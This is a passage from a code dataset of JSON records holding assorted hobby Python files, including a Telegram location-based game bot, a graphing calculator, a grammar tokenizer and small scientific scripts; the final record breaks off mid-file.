+{"seq_id":"57935349","text":"\"\"\"\n自定义的open, 用于不同之间的编码\n\"\"\"\n\n# 支持的编码类型\nCodings = {\"utf8\", \"gbk\"}\n\n# 文件操作符类型\nfs_oprate = {\"w\", \"r\"}\n\n\nclass OprationError(Exception):\n def __str__(self):\n return \"文件操作符类型不正确!,仅支持{}\".format(\"和\".join(fs_oprate))\n\n\nclass CustomOpen:\n \"\"\"\n 重写open\n \"\"\"\n def __init__(self, file, rwmode=\"\"):\n self.rwmode = rwmode\n self.file = file\n self._f = \"\"\n self.data = \"\"\n self.__initread()\n\n def __initread(self):\n if not self.rwmode:\n for code in Codings:\n try:\n self._f = open(self.file, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n else:\n if self.rwmode == \"r\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n self.data = self._f.read()\n break\n except UnicodeDecodeError:\n continue\n if self.rwmode == \"w\":\n for code in Codings:\n try:\n self._f = open(self.file, self.rwmode, encoding=code)\n break\n except UnicodeDecodeError:\n continue\n\n def read(self):\n return self.data\n\n def write(self, content):\n self._f.write(content)\n\n def close(self):\n self._f.close()\n\n def __setattr__(self, key, value):\n if key == \"rwmode\":\n if value not in {\"r\", \"w\", \"\"}:\n raise OprationError\n super().__setattr__(key, value)\n\n\nif __name__ == \"__main__\":\n f = CustomOpen(r\"/home/tangxinwu/Desktop/workspace/Android/gradle.properties\")\n print(f.read())\n","sub_path":"infrastructure/plugin/CustomOpen.py","file_name":"CustomOpen.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"476675251","text":"''' This script produces a scatter plot of the Hourly Wind Speed (HOURLYWindSpeed) vs Hourly Station Pressure (HOURLYStationPressure).\nAny wind speeds over 70% of max wind should be colored red. '''\n\n'''Data downloaded from National Center for Environmental Information (NCEI)'''\n\n\n\nimport numpy as np \nimport matplotlib.pyplot as plt\n\n##Read the csv file\ndata = 'NCEIdata.csv'\n\n\"\"\"Making a 2d numpy array from data where only the wind and pressure columns are taken\nAlso masked and hide columns with no values\"\"\"\ndata1 = np.genfromtxt(data, delimiter=',', dtype = float, skip_header=1, usecols=(17,20))\ndata1 = np.ma.masked_where(np.isnan(data1), data1)\ndata1 = np.ma.compress_rows(data1)\n\n\n#Defining wind and pressure array through indexing\nwind = (data1[:,0])\npressure = (data1[:,1])\n\n#Finding the 70% of highest wind threshold\nhighwind = (np.amax(wind))*0.7\n\n#Making a array where winds below threshold are masked\nstrongwind = np.ma.masked_where(wind < highwind, wind)\n\n\n#Making the plot \nplt.scatter(wind,pressure, label = \"Wind vs. Pressure\", s = 4)\nplt.scatter(strongwind,pressure, c = 'r', s = 4, label = \"Strongest Wind vs. Pressure\")\nplt.title(\"Wind Speed vs. Pressure\")\nplt.xlabel(\"Wind Speed (mph)\")\nplt.ylabel(\"Pressure (in)\")\nplt.legend(loc='best')\nplt.show()\n\n\n\n\n","sub_path":"NCEI_Conditions.py","file_name":"NCEI_Conditions.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"50080683","text":"class RootFindingClass:\n def __init__(self, minv, maxv, N, method, f, fp, tol):\n import numpy as np\n self.minv = float(minv)\n self.maxv = float(maxv)\n self.N = N\n self.method = method\n self.f = f\n self.fp = fp\n self.tol = tol\n\n def Solve(self):\n\n if self.method is 'Bisection':\n from Bisection import Bisection\n self.x_n = Bisection([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'RegulaFalsi':\n from RegulaFalsi import RegulaFalsi\n self.x_n = RegulaFalsi([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'Secant':\n from Secant import Secant\n self.x_n = Secant([self.minv, self.maxv], self.N, self.f)\n elif self.method is 'NewtonRaphson':\n from NewtonRaphson import NewtonRaphson\n self.x_n = NewtonRaphson([self.minv, self.maxv], self.N, self.f, self.fp)\n elif self.method is 'Brent':\n from Brent import Brent\n self.x_n = Brent([self.minv, self.maxv], self.N, self.f, self.tol)\n\n#def f (x): return x**3 - 27\n#def fp(x): return 3*x**2\n#\n#Eqn = RootFindingClass(1, 10, 10, 'Brent', f, fp, 1e-4)\n#Eqn.Solve()\n#\n#print Eqn.x_n\n","sub_path":"Root finding/RootFinding_class.py","file_name":"RootFinding_class.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"524228501","text":"import numpy as np\nimport open3d as o3d\n\n\ndef simplification(verts, faces, target_number_of_triangles, maximum_error=None, boundary_weight=1.0):\n tri_mesh = o3d.geometry.TriangleMesh()\n tri_mesh.vertices = o3d.utility.Vector3dVector(verts)\n tri_mesh.triangles = o3d.utility.Vector3iVector(faces)\n simplified_mesh = tri_mesh.simplify_quadric_decimation(\n target_number_of_triangles)\n return np.array(simplified_mesh.vertices), np.array(simplified_mesh.triangles)\n","sub_path":"mesh_process/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"364817264","text":"import sublime, sublime_plugin\n\n\nclass MultiSelectCommand(sublime_plugin.TextCommand):\n '''\n Установка курсора в начало каждой из выделенных строк\n '''\n def run(self, edit):\n v = self.view\n\n # Получаем выделенные регионы\n selected_regions = list(v.sel())\n\n # Убираем выделения текста\n v.sel().clear()\n\n '''\n Проходимся по всем выделеным регионам\n и получаем границы выделенных строк\n '''\n for sel_region in selected_regions:\n selected_lines = v.lines(sel_region)\n\n # Проходимся по всем выделенным строкам\n for (start, end) in selected_lines:\n # Устанавливаем курсор в начало строки\n v.sel().add(sublime.Region(start))\n\n sublime.status_message(\"success\")\n","sub_path":"multiselect.py","file_name":"multiselect.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"382549020","text":"# Andy Kotz final project: graphing calculator with regressions\n\nfrom ggame import App, Color, LineStyle, Sprite, RectangleAsset, TextAsset\nfrom ggame import CircleAsset, ImageAsset\nfrom math import sin, cos, radians\n\nSCREEN_WIDTH = 1900\nSCREEN_HEIGHT = 1000\n\ndef correlation(xlistpts,ylistpts):\n N = len(xlistpts)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ey2list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n for i in ylistpts:\n jumby = i**2\n Ey2list.append(jumby)\n Ex2 = sum(Ex2list)\n Ey2 = sum(Ey2list)\n numerator = (N*Exy)-(Ex*Ey)\n denominator = (((N*Ex2)-(Ex)**2)*((N*Ey2)-(Ey)**2))**0.5\n r = numerator/denominator\n return (r)\ndef quadreg(xlistpts,ylistpts):\n N = len(xlistpts)\n Ex = sum(xlistpts)\n Ey = sum(ylistpts)\n Ex2list = []\n Ex3list = []\n Ex4list = []\n for j in xlistpts:\n jummy = j**2\n Ex2list.append(jummy)\n Ex2 = sum(Ex2list)\n for j in xlistpts:\n jummy = j**3\n Ex2list.append(jummy)\n Ex3 = sum(Ex3list)\n for j in xlistpts:\n jummy = j**4\n Ex2list.append(jummy)\n Ex4 = sum(Ex4list)\n corgofor = 0\n Exylist = []\n while corgofor <= len(xlistpts)-1:\n jum = xlistpts[corgofor]*ylistpts[corgofor]\n Exylist.append(jum)\n corgofor += 1\n Exy = sum(Exylist)\n Ex2y = Ex2+Ey\n Exx = (Ex2)-(((Ex)**2)/N)\n Exy = (Exy) - ((Ex*Ey)/N)\n Exx2 = (Ex3) - ((Ex2*Ex)/N)\n Ex2y = (Ex2y) - ((Ex2*Ey)/N)\n Ex2x2 = (Ex4) - (((Ex2)**2)/N)\n a = ((Ex2y*Exx)-(Exy*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n b = ((Exy*Ex2x2)-(Ex2y*Exx2))/((Exx*Ex2x2)-(Exx2)**2)\n c = (Ey/N)-(b*(Ex/N))-(a*(Ex2/N))\n returnlist = [a,b,c]\n return(returnlist)\n\ncoords = None\nesetreg = TextAsset(\"Congratulations! you win 1 million dollars!\", style = '40pt Arial')\nred = Color(0xff0000, 1.0)\ngreen = Color(0x00ff00, 1.0)\nblue = Color(0x0000ff, 1.0)\nblack = Color(0x000000, 1.0)\npurple = Color(0x9B30FF, 1.0)\ngrey = Color(0xd3d3d3, 0.7)\nthinline = LineStyle(0, black)\nyaxis = RectangleAsset(1, 1000, thinline, black)\nxaxis = RectangleAsset(1900, 1, thinline, black)\nycursor = RectangleAsset(1, 1000, thinline, grey)\nxcursor = RectangleAsset(1900, 1, thinline, grey)\nclass Xcursorclass(Sprite):\n def __init__(self, position):\n super().__init__(xcursor, position)\nclass Ycursorclass(Sprite):\n def __init__(self, position):\n super().__init__(ycursor, position)\nxcurse = Xcursorclass((0,0))\nycurse = Ycursorclass((0,0))\nxaxisrulings = RectangleAsset(1, 7, thinline, black)\nyaxisrulings = RectangleAsset(7, 1, thinline, black)\nthinline = LineStyle(0, black)\ncircle = CircleAsset(3, thinline, blue)\ncirclebig = CircleAsset(6, thinline, red)\nSprite (xaxis, (0, 500))\nSprite (yaxis, (950, 0))\nsmiley = ImageAsset(\"smileyface.jpg\")\nyaxisrulingsprites = [Sprite(yaxisrulings, (947.5, y*20)) for y in range(-100, 100, 1)]\nxaxisrulingsprites = [Sprite(xaxisrulings, (x*20+10, 497)) for x in range(-150, 150, 1)]\n\nxcoordinates2 = range(-1500, 1500, 1)\nxcoordinates = []\nfor x in xcoordinates2:\n x = x/32\n xcoordinates.append(x)\n\npointpos = 1\nlinetypelist = input(\"choose function, plot (f,p). Separate by commas: \")\nlinetypelist = linetypelist.split(\",\")\nfor linetype in linetypelist:\n if linetype == \"f\":\n function = input(\"y=\")\n for x in xcoordinates:\n yval = (-20*(eval(function))+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if linetype == \"p\":\n again = True\n ylistpts=[]\n xlistpts=[]\n while again == True:\n point = input(\"input point x,y. press q to quit, qr or lr to regress: \")\n if point == \"q\" or point == \"qr\" or point == \"lr\":\n again = False\n if again == True:\n point = point.split(\",\")\n xlistpts.append(float(point[0]))\n ylistpts.append(float(point[1]))\n if point == \"lr\":\n xlistmean = (sum(xlistpts))/len(xlistpts)\n ylistmean = (sum(ylistpts))/len(ylistpts)\n xmeanlist = []\n ymeanlist = []\n for i in xlistpts:\n x = i-xlistmean\n x = x**2\n xmeanlist.append(x)\n for i in ylistpts:\n y = i-ylistmean\n y = y**2\n ymeanlist.append(y)\n sdx = (sum(xmeanlist)/len(xmeanlist))**0.5\n sdy = (sum(ymeanlist)/len(ymeanlist))**0.5\n rval = correlation(xlistpts, ylistpts)\n regreslope = rval*(sdy/sdx)\n regreintercept = ylistmean - (regreslope*xlistmean)\n regreinterceptprint = str(round(10*regreintercept)/10)\n oper = \"+\"+regreinterceptprint\n if regreintercept < 0:\n oper = \"-\"+regreinterceptprint\n if regreintercept == 0:\n oper = \"\"\n print (\"Regression: y=\"+str((round(10*regreslope))/10)+\"x\"+ oper +\". r = \" + str(round(10000*rval)/10000))\n for x in xcoordinates:\n yval = (-20*(regreslope*x+regreintercept)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n if point == \"qr\":\n abc = quadreg(xlistpts,ylistpts)\n quada = abc[0]\n quadb = abc[1]\n quadc = abc[2]\n for x in xcoordinates:\n yval = (-20*(quada*(x**2)+quadb*x+quadc)+500)\n if yval >= 0 and yval <= 1000:\n Sprite (circle, ((20*x+950), yval))\n goforh = 0\n while goforh <= len(xlistpts)-1:\n Sprite(circlebig, (20*float(xlistpts[goforh])+950, -20*float(ylistpts[goforh])+500))\n goforh += 1\n goforlist = 1\n while goforlist <= len(xlistpts)-1:\n pointz = TextAsset(\"(\"+str(xlistpts[goforlist-1])+\",\"+str(ylistpts[goforlist-1])+\"), (\"+str(xlistpts[goforlist])+\",\"+str(ylistpts[goforlist])+\")\", style = '8pt Arial')\n goforlist+=2\n Sprite (pointz, (10, pointpos*15))\n pointpos+=1\n if linetype in ['a', 'b', 'c', 'd', 'e', 's', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'q', 'r', 't', 'u', 'v', 'w', 'x', 'y', 'z']:\n Sprite (esetreg, (200, 200))\ndef mousePosition(event):\n global text\n global coords\n if coords != None:\n coords.destroy()\n xcurse.y = event.y-7\n ycurse.x = event.x-9\n text = TextAsset(\"(\" + str(round((event.x-959)/20)) + \",\" + str(round((-(event.y-507))/20)) + \")\", style = '10pt Arial')\n coords = Sprite(text, (event.x-7, event.y-22))\ndef mouseclick(event):\n Sprite (smiley, (100, 100))\n \n\nmyapp = App(SCREEN_WIDTH, SCREEN_HEIGHT)\nmyapp.run()\nmyapp.listenMouseEvent('mousemove', mousePosition)\nmyapp.listenMouseEvent('mouseclick', mouseclick)\n","sub_path":"Graphingcalc.py","file_name":"Graphingcalc.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"52991472","text":"#!/usr/bin/env python\n\nimport qm\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt\nimport random\n\n# set up the plotting code to use latex\nparams = { 'text.usetex': True }\npylab.rcParams.update(params)\n\n# data parameters\npi = qm.QM_PI\nN = 262144\nsf = 4096.0\ndt = 1.0 / sf\nf_min = 40.0\nconv = 0\n\n# noise generation seed\nseed = 78\n\n# generate an Initial LIGO power spectrum\npsd = qm.new_ligo_psd(N,dt)\n\n# template 1 parameters\nm1_1 = random.uniform(6,14)\nsup_1 = min(3,15-m1_1)\nm2_1 = random.uniform(1,sup_1)\nchi_1 = random.uniform(0.01,0.99)\nkappa_1 = random.uniform(-0.99,0.99)\n\n# template 2 parameters\nm1_2 = random.uniform(6,14)\nsup_2 = min(3,15-m1_1)\nm2_2 = random.uniform(1,sup_1)\nchi_2 = random.uniform(0.01,0.99)\nkappa_2 = random.uniform(-0.99,0.99)\n\ndistance = qm.calculate_ptf_kludge_distance( m1_1, m2_1, chi_1, kappa_1, m1_2, m2_2,\nchi_2, kappa_2, psd, f_min )\n\nprint(\"template #1 parameters: (m1_1, m2_1, chi_1, kappa_1) = (%f %f %f %f)\\n\" % (m1_1,\nm2_1, chi_1, kappa_1))\nprint(\"template #2 parameters: (m1_2, m2_2, chi_2, kappa_2) = (%f %f %f %f)\\n\" % (m1_2,\nm2_2, chi_2, kappa_2))\nprint (\"distance = %f\\n\" % distance)\n","sub_path":"test/ptf_kludge_distance_test.py","file_name":"ptf_kludge_distance_test.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"495917801","text":"# general imports\nimport re\n\n# tokenizer imports\nfrom S_parser.Tokenizer.Stup_Option import Option\nfrom S_parser.Tokenizer.Stup_Selector import Selector\nfrom S_parser.Tokenizer.Token import Token\n# imports for the ast\nfrom S_parser.Tree.Stup_Token_Selector import TokenSelector\n\n# DEBUG FLAGS\nDebugShowTokens = True\n\n# MainOptions with patterns to match\nMainOptions = []\nMainOptions.append(Option(\"Tag\", r\"\\<([a-zA-Z0-9_]+)\\>\", 1))\nMainOptions.append(Option(\"String\", r'\"(?:[^\"\\\\]|\\\\.)*\"'))\nMainOptions.append(Option(\"Regex\", r\"R/(.+?)\\/R\", 1))\nMainOptions.append(Option(\"Colon\", r\"\\:\"))\nMainOptions.append(Option(\"SemiColon\", r\"\\;\"))\nMainOptions.append(Option(\"LBrace\", r\"\\[\"))\nMainOptions.append(Option(\"RBrace\", r\"\\]\"))\nMainOptions.append(Option(\"Comma\", r\"\\,\"))\nMainOptions.append(Option(\"plus\", r\"\\+\"))\nMainOptions.append(Option(\"star\", r\"\\*\"))\n\n# the whitespaces for debugging (whitespace after newline)\nMainOptions.append(Option(\"NewLine\", r\"\\n\"))\nMainOptions.append(Option(\"Whitespace\", r\"\\s+\"))\n\nclass Parser:\n # give the grammar to the parser.\n # the default entrypoint\n def __init__(self, grammar, entry_point=\"start\"):\n # put the grammar for the parser into a variable\n self.grammar = grammar\n self.grammar_text = grammar\n # keep track of where I am inside the grammar\n self.line = 1\n self.index = 0\n print(\"creating the parser!\")\n self.MainSelector = Selector(MainOptions)\n # start building the grammar for my parser\n toks = self.Grammar_to_tokens()\n print(\"build the parser! from text:\")\n print(self.grammar_text)\n self.Meta_Selector = TokenSelector(toks, entry_point)\n\n # get the tokens from the grammar file\n def Grammar_to_tokens(self):\n # get all the tokens from the grammar file\n tokens = []\n for tok in self.get_Tokens():\n if tok[1].name == \"NewLine\":\n self.line += 1\n self.index = 0\n else:\n # update the location after setting the token\n if tok[1].name != \"Whitespace\":\n tok[1].setLocation(self.line, self.index)\n tokens.append(tok)\n # add the length of the token to the index\n self.index += len(tok[0])\n\n # tok[0] is the full matched string.\n # tok[1] is the token that get's made\n self.grammar = self.grammar[len(tok[0]):]\n\n # now that we have the tokens we only keep the token object\n tokens = [tok[1] for tok in tokens]\n if DebugShowTokens:\n # show the tokens\n for tok in tokens:\n print(tok)\n return tokens\n\n # private function that returns the tokens\n def get_Tokens(self):\n canParse = True\n # start parsing the grammar file\n while len(self.grammar) > 0 and canParse:\n canParse = False\n choiceIndex = self.MainSelector.select(self.grammar)\n # verify the index\n if self.MainSelector.verifyIndex(choiceIndex):\n canParse = True\n # get the matched text from the chosen option\n matched_text = self.MainSelector.options[choiceIndex].match(self.grammar)\n yield [matched_text.group(0), Token(self.MainSelector.options[choiceIndex].name, matched_text.group(self.MainSelector.options[choiceIndex].group))]\n else:\n # we will have to break out of this loop and see what text does not parse.\n canParse = False\n if len(self.grammar) > 0:\n # could not parse a piece of text\n print(\"length of text is:'{}'\".format(len(self.grammar)))\n raise SyntaxError(\"The grammar file could not be read correctly. error on:'{}'\".format(self.grammar))\n else:\n print(\"grammar tokenized succesfully\")","sub_path":"src/S_parser/Stupid_parser.py","file_name":"Stupid_parser.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"243958089","text":"import tulip.value as v\nfrom tulip.symbol import sym\nfrom tulip.lexer import Token\n\ndef parse_skeleton(lexer):\n lexer.setup()\n parsed = _parse_sequence(lexer, None, 0)\n lexer.teardown()\n return parsed\n\nclass ParseError(StandardError):\n def __init__(self, token, message):\n self.token = token\n self.message = message\n\nclass UnexpectedError(ParseError):\n def dump(self):\n return u'unexpected token %s: %s' % (self.token.dump(), self.message)\n\nclass UnmatchedError(ParseError):\n def dump(self):\n return u'unmatched delimiter %s: expected %s' % (self.token.dump(), self.message)\n\ndef unexpected(tok, message):\n raise UnexpectedError(tok, message)\n\ndef unmatched(tok, message):\n raise UnmatchedError(tok, message)\n\ndef _parse_sequence(lexer, open_tok, expected_close_id):\n elements = []\n\n while True:\n tok = lexer.next()\n\n if tok.tokid == Token.EOF:\n if open_tok is None:\n return v.cons_list(elements)\n else:\n unmatched(open_tok, Token.TOKENS[expected_close_id])\n elif open_tok is not None and tok.tokid == expected_close_id:\n return v.tag(u'nested', [v.Token(open_tok), v.Token(tok), v.cons_list(elements)])\n elif tok.tokid in [ Token.RPAREN, Token.RBRACK, Token.RBRACE ]:\n if open_tok is not None:\n unexpected(tok, u'invalid nesting from %s' % open_tok.dump())\n else:\n unexpected(tok, u'invalid nesting from the beginning')\n elif tok.tokid == Token.LPAREN:\n elements.append(_parse_sequence(lexer, tok, Token.RPAREN))\n elif tok.tokid == Token.LBRACK or tok.tokid == Token.MACRO:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACK))\n elif tok.tokid == Token.LBRACE:\n elements.append(_parse_sequence(lexer, tok, Token.RBRACE))\n elif tok.tokid == Token.NL and expected_close_id == Token.RPAREN:\n pass\n elif tok.tokid == Token.NL and lexer.peek().eats_preceding_newline():\n pass\n else:\n elements.append(v.tag(u'token', [v.Token(tok)]))\n\ndef parse_from_string(s):\n from tulip.reader import StringReader\n from tulip.lexer import ReaderLexer\n reader = StringReader(u'(parse_from_string)', s)\n lexer = ReaderLexer(reader)\n return parse_skeleton(lexer)\n","sub_path":"tulip/skeleton.py","file_name":"skeleton.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"148932074","text":"from newsie.models import ArticleCluster\nfrom datetime import datetime, timedelta\nfrom django.utils import timezone\nfrom newsie.publications.get_articles import categories\n\ndef find_top_stories():\n for category in categories(): #Iterate through RSS feed Categories\n\n #Get today's stories\n today = timezone.make_aware(datetime.today())\n last_36_hours = timezone.make_aware(datetime.today() - timedelta(hours=36))\n\n # Find top 5 clusters if size is 2 or greater\n top_stories = ArticleCluster.objects \\\n .filter(most_recent_pub_date__gte=last_36_hours, category__exact=category, size_today__gte=2) \\\n .order_by('-size_today')[:15]\n\n for cluster in top_stories:\n cluster.top_story_on = today\n cluster.save()","sub_path":"newsie/scripts/find_top_stories.py","file_name":"find_top_stories.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"286130918","text":"import logging\r\nimport sqlite3\r\n\r\nimport math\r\nfrom telegram import Message, Chat, ReplyKeyboardMarkup, KeyboardButton, Location\r\nfrom telegram.ext import Updater, CommandHandler, MessageHandler\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n# ----------------------------------------------------------------------------------------------------------------------\r\n\r\nDISCOVER_RADIUS = 0.1\r\n\r\ndef start(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n\r\n message = \"Something went wrong :(\"\r\n\r\n select_data = (str(update.message.from_user.username),)\r\n db.execute(\"SELECT * FROM users WHERE name=?\", select_data)\r\n user = db.fetchone()\r\n if user:\r\n message = ' '.join(['Welcome back ' + user[0] + '! You have*',\r\n str(user[1]), 'points*.\\nType /help if you need anything.'])\r\n else:\r\n insert_data = (str(update.message.from_user.username), 10, \"\")\r\n db.execute(\"INSERT INTO users (name, points, objdesc) VALUES (?,?,?)\", insert_data)\r\n message = 'Hello ' + insert_data[0] + '!\\nType /help if you need anything!'\r\n\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n db_connection.commit()\r\n\r\n\r\ndef send_help(bot, update):\r\n message = ''.join(['*JHGeoGameBot* hosts a location-based game in which you will try to capture objectives.\\n',\r\n 'To begin playing, type /start and send a location. We will automatically parse it for you and ',\r\n 'give you the distance to the closest objective. Once you\\'re close enough, you will capture ',\r\n 'it and receive *25 points* for your effort.\\n\\n',\r\n 'When you reach *100 points* you will be able to set up your own objective as long as it is ',\r\n 'far enough from any other existing objective. When other users capture your objective, ',\r\n 'you will receive *5 points*.\\n'\r\n ])\r\n bot.sendMessage(update.message.chat.id, message, parse_mode=\"Markdown\")\r\n\r\n\r\ndef get_points(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, id integer) \")\r\n db.execute(\"SELECT points FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n points = db.fetchone()\r\n message = \"\"\r\n db.execute(\"SELECT * FROM locations\")\r\n print(db.fetchall())\r\n if points is not None:\r\n message = ''.join(['You have *' + str(points[0]) + ' points*.\\n',\r\n 'You can use *100 points* to set up your own objective with /addobj'\r\n ])\r\n else:\r\n message = 'It seems you haven\\'t started playing. Type /start and join the game!'\r\n\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n\r\n\r\ndef add_objective(bot, update, args):\r\n if len(args) > 0:\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if user[2]:\r\n bot.sendMessage(update.message.chat.id,\r\n 'You are already adding a new objective. Type /cancel to get your points back.',\r\n reply_to_message_id=update.message.message_id)\r\n elif user[1] >= 100:\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]-100, ' '.join(args), user[0]))\r\n message = ''.join(['I have now subtracted *100 points* from your score. ',\r\n 'The next location you send will be registered as an objective. ',\r\n 'Type /cancel to get your points back.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n parse_mode=\"Markdown\",\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n message = ''.join(['You don\\'t have enough points to set up a new objective.',\r\n ' Try again when you have *100 points*.'])\r\n bot.sendMessage(update.message.chat.id,\r\n message,\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Usage: /addobj ',\r\n reply_to_message_id=update.message.message_id)\r\n\r\n\r\ndef cancel_objective(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n if len(user[2]):\r\n db.execute(\"UPDATE users SET points=?, objdesc=? WHERE name=?\", (user[1]+100, \"\", user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'Canceled successfully. You now have *' + str(user[1]+100) + '* points.',\r\n reply_to_message_id=update.message.message_id,\r\n parse_mode=\"Markdown\")\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'Nothing to cancel.',\r\n reply_to_message_id=update.message.message_id)\r\n else:\r\n bot.sendMessage(update.message.chat.id,\r\n 'It seems you haven\\'t started playing. Type /start and join the game!',\r\n reply_to_message_id=update.message.message_id)\r\n db_connection.commit()\r\n\r\n\r\ndef cheat(bot, update):\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n db.execute(\"UPDATE users SET points=? WHERE name=?\", (user[1]+100, user[0]))\r\n bot.sendMessage(update.message.chat.id,\r\n 'You HACKED yourself some points.')\r\n db_connection.commit()\r\n\r\n\r\ndef distFromCoords(lon1, lat1, lon2, lat2):\r\n radius = 6371\r\n dlon = abs(lon1-lon2)*math.pi/180\r\n dlat = abs(lat1-lat2)*math.pi/180\r\n a = math.sin(dlat/2)*math.sin(dlat/2)+math.cos(lat1*math.pi/180)*math.cos(lat2*math.pi/180)*math.sin(dlon/2)*math.sin(dlon/2)\r\n b = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))\r\n dist = radius*b\r\n return dist\r\n\r\n\r\ndef message_handler(bot, update):\r\n if update.message.text:\r\n keyboard_button = KeyboardButton(text='Send location', request_location=True)\r\n bot.sendMessage(update.message.chat.id,\r\n 'Less talking and more searching!\\nSend me your location to search around!',\r\n reply_to_message_id=update.message.message_id,\r\n reply_markup=ReplyKeyboardMarkup([[keyboard_button]]))\r\n elif update.message.location:\r\n lon = update.message.location['longitude']\r\n lat = update.message.location['latitude']\r\n db_connection = sqlite3.connect('JacobsHack.db')\r\n db = db_connection.cursor()\r\n db.execute(\"CREATE TABLE IF NOT EXISTS users (name text, points integer, objdesc text)\")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS locations (lon real, lat real, owner text, objdesc text, locid integer) \")\r\n db.execute(\"CREATE TABLE IF NOT EXISTS matches (user text, matchid integer)\")\r\n\r\n db.execute(\"SELECT * FROM users WHERE name=?\", (str(update.message.from_user.username),))\r\n user = db.fetchone()\r\n if user:\r\n min_dist = 10000\r\n usr = ''\r\n desc = ''\r\n objid = 0\r\n for obj in db.execute(\"SELECT * FROM locations WHERE owner!=? AND locid NOT IN (SELECT matchid FROM matches WHERE user=?)\", (user[0],user[0])):\r\n if obj is not None:\r\n dist = distFromCoords(obj[0], obj[1], lon, lat)\r\n if dist < min_dist:\r\n min_dist = dist\r\n usr = obj[2]\r\n desc = obj[3]\r\n objid = obj[4]\r\n if user[2]:\r\n if min_dist > DISCOVER_RADIUS:\r\n db.execute(\"SELECT COUNT(*) FROM locations\")\r\n size = db.fetchone()[0]\r\n db.execute(\"INSERT INTO locations (lon, lat, owner, objdesc, locid) VALUES (?,?,?,?,?)\",\r\n (lon, lat, update.message.from_user.username, user[2], size))\r\n db.execute(\"UPDATE users SET objdesc='' WHERE 